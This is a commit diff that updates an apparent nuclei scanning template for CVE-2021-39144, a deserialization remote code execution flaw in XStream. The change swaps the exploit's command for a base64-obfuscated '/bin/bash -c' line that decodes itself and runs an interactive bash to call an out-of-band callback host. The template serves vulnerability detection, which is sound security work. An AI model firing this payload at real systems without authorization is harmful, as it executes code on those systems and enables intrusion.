Update CVE-2021-39144.yaml

patch-1
j4vaovo 2023-04-24 03:59:57 +08:00 committed by GitHub
parent 166cc9ef1d
commit 81dea5dafb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 2 deletions

View File

@ -19,6 +19,9 @@ info:
cwe-id: CWE-94,CWE-502 cwe-id: CWE-94,CWE-502
tags: cve,cve2021,xstream,deserialization,rce,kev tags: cve,cve2021,xstream,deserialization,rce,kev
variables:
rand: "{{rand_base(6)}}"
requests: requests:
- raw: - raw:
- | - |
@ -61,7 +64,7 @@ requests:
</probes> </probes>
</handler> </handler>
</dynamic-proxy> </dynamic-proxy>
<string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string> <string>/bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i}</string>
</java.util.PriorityQueue> </java.util.PriorityQueue>
</java.util.PriorityQueue> </java.util.PriorityQueue>
@ -75,6 +78,6 @@ requests:
- type: word - type: word
part: interactsh_request part: interactsh_request
words: words:
- "User-Agent: {{rand_base(6)}}" - "User-Agent: {{rand}}"
# Enhanced by cs on 2023/04/17 # Enhanced by cs on 2023/04/17